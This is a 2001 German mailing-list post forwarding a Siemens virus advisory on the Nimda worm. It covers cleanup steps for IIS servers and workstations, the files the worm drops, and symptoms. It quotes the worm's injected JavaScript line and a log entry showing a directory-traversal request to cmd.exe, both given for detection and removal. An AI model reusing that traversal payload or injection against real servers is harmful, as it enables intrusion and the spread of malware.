Title:
Hi Leute,
 
Ausnahmsweise mal eine HTML Mail von mir.
 
Unser VCC hat es recht gut beschrieben:
 

Virusinformation zu Nimda [W32/Nimda.A@mm]
Name/Alias Nimda [W32/Nimda.A@mm]
Kurzbeschreibung

Bereinigung des Virus (nicht verifiziert):

NT-Server mit IIS

  1. Spielen Sie auf IIS die unter e MS00-078 und MS00-057 bereitgestellten Hoitfixes ein
  2. Starten Sie den Server durch
  3. �berpr�fen Sie den Gast-Account und die Gast-Gruppe. Falls aktiv: deaktivieren
  4. Scannen Sie das gesamte System mit ServerProtect (Signatur 941). Erste Aktion: CLEAN; zweite Aktion: DELETE! Alle Dateien scannen. �berpr�fen Sie, ob alle Dateien gel�scht wurden.
  5. L�schen Sie in %WINDIR% die Dateien MEP*.TMP und MEP*.TMP.EXE
  6. �berpr�fen Sie auf IIS-Maschinen die Dateien
     index.html
     index.htm
     index.asp
     readme.html
     readme.htm
     readme.asp
     main.html
     main.htm
     main.asp
     default.html
     default.htm
     default.asp 
    auf den Inhalt  <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>. Diese Zeile muss gel�scht werden.
  7. �berpr�fen Sie weiterhin die Real Time Scan Results. Andere Maschinen werden versuchen, den Server �ber das Dateisystem zu infizieren. Die Details der Virenereignisse geben Ihnen Informationen zur Auffindung der betroffenen Maschine (User account).

NT_Workstation:

  1. Deaktiviren Sie ggfs. den Personal Webserver (PWS)
  2. Spielen Sie den ggfs den bei Microsoft verf�gbaren Patch ein
  3. Starten Sie den Rechner neu
  4. �berpr�fen Sie den Gast-Account und die Gast-Gruppe. Falls aktiv: deaktivieren
  5. Scannen Sie die komplette Maschine mit OfficeScan (Signatur 941); �berpr�fen Sie, ob der Virus in der zweiten Aktion gel�scht/umbenannt/verschoben wurde
  6. L�schen Sie in %WINDIR% die Dateien MEP*.TMP und MEP*.TMP.EXE
  7. �berpr�fen Sie auf PWS-Maschinen die Dateien
     index.html
     index.htm
     index.asp
     readme.html
     readme.htm
     readme.asp
     main.html
     main.htm
     main.asp
     default.html
     default.htm
     default.asp 
    auf den Inhalt  <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>. Diese Zeile muss gel�scht werden.

 


 

  1. Beenden des Virenprozesses: Im Task-Manager den Prozess ME******tmp. beenden.

Tool CLEANNIMDA um verseuchte Dateien zu l�schen. ACHTUNG: Die Bereinigung der Registry ist nicht m�glich. Laufende Virenprozesse werden nicht gestoppt. Bitte lassen Sie das Tool nach einem Neustart ein zweites mal laufen, da offene Dateien nicht gel�scht werden k�nnen.

Folgende Dateien werden vom Virus sicher erzeugt, verseucht oder verwendet

Dateiname Dateigr��e in Byte
*.EML 79.225
*.NWS 79.225
ADMIN.DLL 57.344
MMC.EXE 57.344
RICHED20.DLL 57.344
README.EXE 57.344
*.HTM* depends

In *.HTM* Dateien f�gt der Virus ein oder zwei Zeilen Java Script ein.

Innerhalb der Siemens AG ist der Wurm Nimda im Umlauf. Der Virus kommt als README.EXE und greift Internet Information Server an. Es gibt Hinweise darauf, dass der Wurm erhebliche Schadensfunktionen hat.

Symptome: schnelle Abfolge von Zugriffen auf Port 80. Beispiel einer Logdatei:

Sep 18 16:04:23.332 bastion httpd[6086]: 121 Statistics: duration=0.00 id=7sI9f sent=97 rcvd=402 srcif=hme0 src="xxx.xxx.xxx.xxx/4929" dstif=hme1 dst=yyy.yyy.yyy.yyy/80 op=GET arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir result="403 Forbidden" proto=http (request denied by gwcontrol)

Das VCC hat eine verd�chtige Datei an die AV-Hersteller geschickt. Name der Datei: ADMIN.DLL.

Neue Informationen werden in diesem Dokument ver�ffentlicht (siehe Viren-Links). Bitte regelm. �berpr�fen.

Eigenschaften Massen-Mailer, Schadens-Funktion vorhanden
Virusarten Wurm
Erst-Information 18.09.2001, aktualisiert am 19.09.2001
Virenvorfall gemeldet 18.09.2001
VCC Risko-Bewertung
Niedrig Mittel Hoch
AV-Hersteller Risko-Bewertung
Niedrig Mittel Hoch
Virus-Meldung
Bei Siemens aufgetreten
Unter VCC-Beobachtung
VCC-Vorsorge-Hinweis
AV-Hersteller-Warnung
VCC-Warnung
VCC-Notfall
In AV-Produkt-Lexikon
Virenmuster im VCC vorhanden
Anzahl betroffene Bereiche: 3
Anzahl Meldungen: 3
Detail-Information: F-Secure
Symantec
Trend Micro
Heise-Verlag (german)

Zur�ck

SBS CISS VCC
Web-Seite maschinell erstellt
Server-Kopie -
kein automatischer Update.
Version:19.09.2001
Copyright 2001 SBS CISS VCC

| [aspdecoffeehouse] als [email protected] subscribed | http://www.aspgerman.com/archiv/aspdecoffeehouse/ = Listenarchiv | Sie k�nnen sich unter folgender URL an- und abmelden: | http://www.aspgerman.com/aspgerman/listen/anmelden/aspdecoffeehouse.asp

Antwort per Email an